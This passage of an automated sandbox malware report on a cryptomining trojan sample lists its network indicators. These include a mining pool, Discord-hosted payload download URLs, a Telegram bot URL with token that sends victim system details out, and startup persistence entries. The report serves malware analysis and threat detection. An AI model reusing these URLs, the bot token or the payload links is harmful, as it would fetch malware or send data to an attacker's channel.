    		truefalse
      		high
      pool.hashvault.pro
      		131.153.142.106
      		truefalse
        		high
        api.telegram.org
        		149.154.167.220
        		truefalse
          		high
          api.ipify.org
          		unknown
          		unknownfalse
            		high

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            https://cdn.discordapp.com/attachments/993716767685873716/993957505698910218/UpSys.exefalse
              		high
              https://cdn.discordapp.com/attachments/993716767685873716/993957763715698769/CPU.zipfalse
                		high
                https://api.ipify.org/false
                  		high
                  https://api.telegram.org/bot5468819057:AAHRJabfvGnrMiNkuZj9RaE8-OjfRBxOw-4/sendMessage?chat_id=1327052997&text=New%20User:%20618321%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20%0AIP:%20102.129.143.92false
                    		high

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://cdn.discordapp.com/attachments/993716767685873716/993957763715698769/CPU.zipSDllHost.exe, 00000000.00000000.376453306.00000208C9708000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      http://crl.mi-powershell.exe, 0000001E.00000002.426612103.000002615F755000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		low
                      https://api.telegram.org/botDllHost.exe, DllHost.exe, 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmp, DllHost.exe, 00000000.00000000.260540492.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmp, System.exe, System.exe, 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmp, System.exe, 0000000B.00000000.298163901.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpfalse
                        		high
                        https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 00000022.00000002.367175062.0000018C3BE3D000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 00000022.00000003.366102600.0000018C3BE61000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 00000022.00000002.367175062.0000018C3BE3D000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://t0.tiles.ditu.live.com/tiles/gensvchost.exe, 00000022.00000003.366166624.0000018C3BE46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000002.367209096.0000018C3BE4D000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://contoso.com/Licensepowershell.exe, 00000002.00000002.425049839.000002D5D13E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 00000022.00000003.366102600.0000018C3BE61000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  http://schemas.microsoft.csvchost.exe, 00000016.00000002.670545437.000002381F8AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.668955947.000002381F8AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://cdn.discordapp.com/DllHost.exe, 00000000.00000000.376453306.00000208C9708000.00000004.00000020.00020000.00000000.sdmp, System.exe, 0000000B.00000002.401773947.0000023FB3C6A000.00000004.00000020.00020000.00000000.sdmp, System.exe, 0000000B.00000000.351308203.0000023FB1F83000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    http://crl.osofts/Microt0powershell.exe, 0000001E.00000003.420144538.0000026161103000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.427098745.0000026161103000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=svchost.exe, 00000022.00000002.367184169.0000018C3BE42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.366380098.0000018C3BE40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.366552191.0000018C3BE41000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://cdn.discordapp.com/attachments/993716767685873716/993957763715698769/CPU.zipgSystem.exe, 0000000B.00000000.358129624.0000023FB3C20000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 00000022.00000003.366102600.0000018C3BE61000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 00000022.00000003.366220145.0000018C3BE5A000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 00000022.00000003.366380098.0000018C3BE40000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://api.telegram.org/FDllHost.exe, 00000000.00000000.366088455.00000208C7947000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000003.266536827.00000208C7947000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 00000022.00000002.367184169.0000018C3BE42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.366380098.0000018C3BE40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.366552191.0000018C3BE41000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://cdn.discordapp.com/attachments/993716767685873716/993957763715698769/CPU.zipPPC:DllHost.exe, 00000000.00000000.366820663.00000208C9741000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000000.369797476.00000208C7878000.00000004.00000020.00020000.00000000.sdmp, System.exe, 0000000B.00000000.352076452.0000023FB3C42000.00000004.00000020.00020000.00000000.sdmp, System.exe, 0000000B.00000002.401017091.0000023FB1E8B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://schemas.xmsvchost.exe, 00000016.00000002.670545437.000002381F8AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.668955947.000002381F8AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://cdn.discordapp.com/attachments/993716767685873716/993957763715698769/CPU.zipndowsDllHost.exe, 00000000.00000002.428101738.00000208C96F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://api.telegram.org/DllHost.exe, 00000000.00000000.366088455.00000208C7947000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000003.266536827.00000208C7947000.00000004.00000020.00020000.00000000.sdmp, System.exe, 0000000B.00000000.350905224.0000023FB1F51000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://contoso.com/powershell.exe, 00000002.00000002.425049839.000002D5D13E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.425049839.000002D5D13E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://cdn.discordapp.com/attachments/993716767685873716/993957763715698769/CPU.zip?System.exe, 0000000B.00000000.358129624.0000023FB3C20000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://api.telegram.org/bot5468819057:AAHRJabfvGnrMiNkuZj9RaE8-OjfRBxOw-4/sendMessage?chat_id=13270System.exe, 0000000B.00000003.323417865.0000023FB1F66000.00000004.00000020.00020000.00000000.sdmp, System.exe, 0000000B.00000000.350905224.0000023FB1F51000.00000004.00000020.00020000.00000000.sdmp, System.exe, 0000000B.00000002.401017091.0000023FB1E8B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://logo.vpowershell.exe, 0000001E.00000003.420144538.0000026161103000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.427098745.0000026161103000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://cdn.discordapp.com/attachments/993716767685873716/993957763715698769/CPU.zipCDllHost.exe, 00000000.00000000.376453306.00000208C9708000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://cdn.discordapp.com/BDllHost.exe, 00000000.00000000.366088455.00000208C7947000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.381791711.000002D5C1381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.427294155.00000261611E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.bingmapsportal.comsvchost.exe, 00000022.00000002.367127734.0000018C3BE13000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://cdn.discordapp.com/attachments/993716767685873716/993957763715698769/CPU.zipsC:DllHost.exe, 00000000.00000000.366820663.00000208C9741000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 00000022.00000002.367175062.0000018C3BE3D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://cdn.discordapp.com/attachments/993716767685873716/993957763715698769/CPU.zipLMEMDllHost.exe, 00000000.00000002.426727400.00000208C78FF000.00000004.00000020.00020000.00000000.sdmp, System.exe, 0000000B.00000002.401017091.0000023FB1E8B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://www.lobalsign.com/roDllHost.exe, 00000000.00000000.369797476.00000208C7878000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 00000022.00000003.366102600.0000018C3BE61000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.425049839.000002D5D13E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=svchost.exe, 00000022.00000003.366494078.0000018C3BE56000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.382357824.000002D5C1589000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://cdn.discordapp.com/attachments/993716767685873716/993957763715698769/CPU.zip1.6LMEMDllHost.exe, 00000000.00000002.426727400.00000208C78FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.382357824.000002D5C1589000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.428765806.00000261613E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://cdn.discordapp.com/attachments/993716767685873716/993957763715698769/CPU.zip&$SDllHost.exe, 00000000.00000002.428101738.00000208C96F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.382357824.000002D5C1589000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://dev.ditu.live.com/REST/v1/Transit/Stops/svchost.exe, 00000022.00000003.365973303.0000018C3BE67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000002.367291080.0000018C3BE69000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://cdn.discordapp.com/vDllHost.exe, 00000000.00000000.366088455.00000208C7947000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 00000022.00000002.367175062.0000018C3BE3D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://xmrig.com/wizard%sprocexp.exe, 00000004.00000000.283520535.00007FF64B7DC000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                https://cdn.discordapp.com/attachments/993716767685873716/993957763715698769/CPU.zipC:System.exe, 0000000B.00000002.401773947.0000023FB3C6A000.00000004.00000020.00020000.00000000.sdmp, System.exe, 0000000B.00000000.358129624.0000023FB3C20000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://api.ipify.org/rootDllHost.exe, 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmp, DllHost.exe, 00000000.00000000.260540492.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmp, System.exe, 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmp, System.exe, 0000000B.00000000.298163901.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpfalse
                                                                                                    		high
                                                                                                    https://contoso.com/Iconpowershell.exe, 00000002.00000002.425049839.000002D5D13E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 00000022.00000003.366494078.0000018C3BE56000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://crl.ver)svchost.exe, 00000016.00000002.671478152.0000023825061000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		low
                                                                                                      https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 00000022.00000003.366135442.0000018C3BE5C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.366380098.0000018C3BE40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000002.367236646.0000018C3BE5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://cdn.discordapp.com/attachments/993716767685873716/993957763715698769/CPU.zip#System.exe, 0000000B.00000000.358129624.0000023FB3C20000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 00000022.00000002.367175062.0000018C3BE3D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000002.367127734.0000018C3BE13000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://xmrig.com/wizardprocexp.exe, 00000004.00000000.283520535.00007FF64B7DC000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            		unknown
                                                                                                            https://%s.xboxlive.comsvchost.exe, 0000001B.00000002.785526412.0000016D7123E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            		low
                                                                                                            https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 00000022.00000003.366166624.0000018C3BE46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000002.367209096.0000018C3BE4D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 00000022.00000003.366102600.0000018C3BE61000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://www.winimage.com/zLibDll1.2.11.z%02dHDllHost.exe, 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmp, DllHost.exe, 00000000.00000000.260540492.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmp, System.exe, 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmp, System.exe, 0000000B.00000000.298163901.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 00000022.00000003.366380098.0000018C3BE40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://dev.virtualearth.net/mapcontrol/logging.ashxsvchost.exe, 00000022.00000003.366102600.0000018C3BE61000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.382357824.000002D5C1589000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://cdn.discordapp.com/attachments/993716767685873716/993957763715698769/CPU.zipoSystem.exe, 0000000B.00000000.358129624.0000023FB3C20000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://cdn.discordapp.com/attachments/993716767685873716/993957763715698769/CPU.zippDllHost.exe, 00000000.00000000.376453306.00000208C9708000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=svchost.exe, 00000022.00000003.366135442.0000018C3BE5C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000002.367236646.0000018C3BE5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://api.telegram.org/bot%0ADllHost.exe, 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmp, DllHost.exe, 00000000.00000000.260540492.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmp, System.exe, 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmp, System.exe, 0000000B.00000000.298163901.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://cdn.discordapp.com/attachments/993716767685873716/993957709391069264/GPU6.ziphttps://cdn.disDllHost.exe, 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmp, DllHost.exe, 00000000.00000000.260540492.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmp, System.exe, 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmp, System.exe, 0000000B.00000000.298163901.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://dynamic.tsvchost.exe, 00000022.00000002.367209096.0000018C3BE4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.366552191.0000018C3BE41000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  		unknown
                                                                                                                                  https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 00000022.00000003.366102600.0000018C3BE61000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000002.00000002.382357824.000002D5C1589000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.428765806.00000261613E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://t0.ssl.ak.tiles.virtualearth.net/tiles/gensvchost.exe, 00000022.00000002.367184169.0000018C3BE42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.366380098.0000018C3BE40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.366552191.0000018C3BE41000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://xmrig.com/docs/algorithmsprocexp.exe, 00000004.00000000.283520535.00007FF64B7DC000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        		unknown
                                                                                                                                        http://www.winimage.com/zLibDllDllHost.exe, 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmp, DllHost.exe, 00000000.00000000.260540492.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmp, System.exe, 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmp, System.exe, 0000000B.00000000.298163901.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://xmrig.com/benchmark/%sprocexp.exe, 00000004.00000000.283520535.00007FF64B7DC000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          		unknown
                                                                                                                                          https://cdn.discordapp.com/-11D0-8F0F-00C04FD7D062DllHost.exe, 00000000.00000002.428101738.00000208C96F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 00000022.00000002.367236646.0000018C3BE5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://api.ipify.org/;dDllHost.exe, 00000000.00000003.265297552.00000208C7947000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000003.265333276.00000208C7947000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://activity.windows.comsvchost.exe, 0000001B.00000002.785526412.0000016D7123E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://cdn.discordapp.com/attachments/993716767685873716/993957763715698769/CPU.zipnC:DllHost.exe, 00000000.00000003.321207659.00000208C9733000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://dev.ditu.live.com/REST/v1/Locationssvchost.exe, 00000022.00000003.366102600.0000018C3BE61000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://cdn.discordapp.com/attachments/993716767685873716/993957763715698769/CPU.zip1C:DllHost.exe, 00000000.00000000.376453306.00000208C9708000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://api.ipify.org/E7DllHost.exe, 00000000.00000000.369797476.00000208C7878000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://%s.dnet.xboxlive.comsvchost.exe, 0000001B.00000002.785526412.0000016D7123E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          		low
                                                                                                                                                          https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 00000022.00000003.366220145.0000018C3BE5A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		high

                                                                                                                                                            World Map of Contacted IPs

                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                            • 75% < No. of IPs

                                                                                                                                                            Public IPs

                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                            149.154.167.220
                                                                                                                                                            		api.telegram.orgUnited Kingdom
                                                                                                                                                            		62041TELEGRAMRUfalse
                                                                                                                                                            131.153.56.98
                                                                                                                                                            		unknownUnited States
                                                                                                                                                            		19181CWIEUStrue
                                                                                                                                                            3.220.57.224
                                                                                                                                                            		unknownUnited States
                                                                                                                                                            		14618AMAZON-AESUSfalse
                                                                                                                                                            52.20.78.240
                                                                                                                                                            		api.ipify.org.herokudns.comUnited States
                                                                                                                                                            		14618AMAZON-AESUSfalse
                                                                                                                                                            162.159.134.233
                                                                                                                                                            		cdn.discordapp.comUnited States
                                                                                                                                                            		13335CLOUDFLARENETUSfalse

                                                                                                                                                            Private

                                                                                                                                                            IP
                                                                                                                                                            192.168.2.1
                                                                                                                                                            127.0.0.1

                                                                                                                                                            General Information

                                                                                                                                                            Joe Sandbox Version:35.0.0 Citrine
                                                                                                                                                            Analysis ID:658699
                                                                                                                                                            Start date and time: 07/07/202209:49:502022-07-07 09:49:50 +02:00
                                                                                                                                                            Joe Sandbox Product:CloudBasic
                                                                                                                                                            Overall analysis duration:0h 16m 39s
                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                            Report type:full
                                                                                                                                                            Sample file name:DllHost.exe
                                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                            Number of analysed new started processes analysed:88
                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                                            Technologies:
                                                                                                                                                            • HCA enabled
                                                                                                                                                            • EGA enabled
                                                                                                                                                            • HDC enabled
                                                                                                                                                            • AMSI enabled
                                                                                                                                                            Analysis Mode:default
                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                            Detection:MAL
                                                                                                                                                            Classification:mal100.troj.evad.mine.winEXE@151/59@6/7
                                                                                                                                                            EGA Information:
                                                                                                                                                            • Successful, ratio: 75%
                                                                                                                                                            HDC Information:
                                                                                                                                                            • Successful, ratio: 61.3% (good quality ratio 49.4%)
                                                                                                                                                            • Quality average: 56.3%
                                                                                                                                                            • Quality standard deviation: 36.3%
                                                                                                                                                            HCA Information:
                                                                                                                                                            • Successful, ratio: 99%
                                                                                                                                                            • Number of executed functions: 138
                                                                                                                                                            • Number of non-executed functions: 179
                                                                                                                                                            Cookbook Comments:
                                                                                                                                                            • Found application associated with file extension: .exe
                                                                                                                                                            • Adjust boot time
                                                                                                                                                            • Enable AMSI
                                                                                                                                                            • Override analysis time to 240s for rundll32

                                                                                                                                                            Warnings

                                                                                                                                                            • Exclude process from analysis (whitelisted): audiodg.exe, BackgroundTransferHost.exe, rundll32.exe, WMIADAP.exe, backgroundTaskHost.exe, WmiPrvSE.exe, wuapihost.exe
                                                                                                                                                            • Excluded IPs from analysis (whitelisted): 23.213.168.66, 20.189.173.21, 52.182.143.212, 20.223.24.244
                                                                                                                                                            • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, e1723.g.akamaiedge.net, time.windows.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, ris.api.iris.microsoft.com, onedsblobprdcus15.centralus.cloudapp.azure.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, sls.update.microsoft.com, onedsblobprdwus16.westus.cloudapp.azure.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                                                                                            • Execution Graph export aborted for target powershell.exe, PID 6204 because it is empty
                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                            Simulations

                                                                                                                                                            Behavior and APIs

                                                                                                                                                            TimeTypeDescription
                                                                                                                                                            09:51:11AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exe.lnk
                                                                                                                                                            09:51:15API Interceptor7x Sleep call for process: DllHost.exe modified
                                                                                                                                                            09:51:16API Interceptor176x Sleep call for process: powershell.exe modified
                                                                                                                                                            09:51:32API Interceptor11x Sleep call for process: svchost.exe modified
                                                                                                                                                            09:51:41API Interceptor1x Sleep call for process: System.exe modified
                                                                                                                                                            09:52:09API Interceptor2x Sleep call for process: WerFault.exe modified
                                                                                                                                                            09:52:29AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\20220707
                                                                                                                                                            09:52:50API Interceptor1x Sleep call for process: MpCmdRun.exe modified

                                                                                                                                                            Joe Sandbox View / Context

                                                                                                                                                            IPs

                                                                                                                                                            No context

                                                                                                                                                            Domains

                                                                                                                                                            No context

                                                                                                                                                            ASNs

                                                                                                                                                            No context

                                                                                                                                                            JA3 Fingerprints

                                                                                                                                                            No context

                                                                                                                                                            Dropped Files

                                                                                                                                                            No context

                                                                                                                                                            Created / dropped Files

                                                                                                                                                            C:\ProgramData\MicrosoftNetwork\System.exe

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\DllHost.exe
                                                                                                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):451072
                                                                                                                                                            Entropy (8bit):6.458496741337227
                                                                                                                                                            Encrypted:false
